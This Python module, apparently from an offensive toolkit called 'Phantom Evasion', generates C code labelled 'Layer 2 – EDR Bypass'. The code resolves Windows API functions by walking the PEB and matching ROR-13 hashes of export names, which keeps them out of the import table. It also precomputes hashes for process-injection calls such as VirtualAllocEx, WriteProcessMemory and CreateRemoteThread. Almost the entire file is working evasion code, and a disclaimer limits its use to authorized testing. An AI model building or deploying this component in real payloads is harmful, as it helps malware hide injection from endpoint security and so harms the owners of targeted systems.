"""
Phantom Evasion - API Hashing EDR Bypass

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


# ── Python-side hash helpers (used for pre-computing expected hashes) ─────────

def djb2(name: str) -> int:
    """Classic djb2 hash (used to verify C-side implementation)."""
    h = 5381
    for ch in name.encode():
        h = ((h << 5) + h + ch) & 0xFFFFFFFF
    return h


def ror13(name: str) -> int:
    """ROR-13 hash – commonly used in shellcode PEB walking."""
    h = 0
    for ch in name.upper().encode():
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ch) & 0xFFFFFFFF
    return h


def generate_api_hashing() -> Dict[str, Any]:
    """Generate C code that resolves Windows API function pointers by hash.

    Walks the PEB → LoaderData → InMemoryOrderModuleList to find loaded
    modules, then walks each module's export directory comparing hashed
    function names against the target hash.

    Uses **ROR-13** hashing by default (a widely used convention).

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``,
        ``python_ror13``, ``python_djb2``.
    """
    # Pre-compute hashes for common APIs (informational / for testing)
    apis = [
        "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
        "LoadLibraryA", "GetProcAddress",
    ]
    hash_comments = "\n".join(
        f"//   {api}: ror13=0x{ror13(api):08X}  djb2=0x{djb2(api):08X}"
        for api in apis
    )

    code = f"""\
// API Hashing (PEB Walk + ROR-13) – generated by Phantom Evasion
// Layer 2 – EDR Bypass
// Resolves API function pointers by hash, avoiding imports visible in the PE IAT.
//
// Pre-computed hashes for common APIs (ROR-13):
{hash_comments}

#ifndef PHANTOM_API_HASHING_INCLUDED
#define PHANTOM_API_HASHING_INCLUDED

#include <windows.h>

// Portable CONTAINING_RECORD definition for environments where the DDK macro
// may not be available (e.g. MinGW without full DDK headers).
#ifndef CONTAINING_RECORD
#define CONTAINING_RECORD(address, type, field) \
    ((type *)((PCHAR)(address) - (ULONG_PTR)(&((type *)0)->field)))
#endif

#define ROR13_MASK 0xFFFFFFFFUL

static DWORD ror13_hash(const char *name) {{
    DWORD hash = 0;
    while (*name) {{
        char c = *name++;
        if (c >= 'a' && c <= 'z') c -= 32;  // to upper
        hash = ((hash >> 13) | (hash << 19)) & ROR13_MASK;
        hash = (hash + (BYTE)c) & ROR13_MASK;
    }}
    return hash;
}}

static FARPROC resolve_api(DWORD target_hash) {{
    // Walk PEB.Ldr.InMemoryOrderModuleList
    PPEB peb = (PPEB)__readgsqword(0x60);
    PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;

    for (PLIST_ENTRY entry = head->Flink; entry != head; entry = entry->Flink) {{
        PLDR_DATA_TABLE_ENTRY mod =
            CONTAINING_RECORD(entry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

        HMODULE hMod = (HMODULE)mod->DllBase;
        if (!hMod) continue;

        PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hMod;
        if (dos->e_magic != IMAGE_DOS_SIGNATURE) continue;

        PIMAGE_NT_HEADERS nt =
            (PIMAGE_NT_HEADERS)((BYTE *)hMod + dos->e_lfanew);
        DWORD export_rva =
            nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
            .VirtualAddress;
        if (!export_rva) continue;

        PIMAGE_EXPORT_DIRECTORY exp =
            (PIMAGE_EXPORT_DIRECTORY)((BYTE *)hMod + export_rva);

        DWORD *names     = (DWORD *)((BYTE *)hMod + exp->AddressOfNames);
        WORD  *ordinals  = (WORD  *)((BYTE *)hMod + exp->AddressOfNameOrdinals);
        DWORD *functions = (DWORD *)((BYTE *)hMod + exp->AddressOfFunctions);

        for (DWORD i = 0; i < exp->NumberOfNames; i++) {{
            const char *fn_name = (const char *)((BYTE *)hMod + names[i]);
            if (ror13_hash(fn_name) == target_hash) {{
                return (FARPROC)((BYTE *)hMod + functions[ordinals[i]]);
            }}
        }}
    }}
    return NULL;
}}

// Example usage:
//   FARPROC pVirtualAllocEx = resolve_api(0x{ror13("VirtualAllocEx"):08X}UL);

#endif /* PHANTOM_API_HASHING_INCLUDED */
"""

    return {
        "code": code,
        "description": "API resolution via ROR-13 hash + PEB walk (no imports in IAT)",
        "layer": "Layer 2 - EDR Bypass",
        "name": "api_hashing",
        "python_ror13": ror13,
        "python_djb2": djb2,
    }
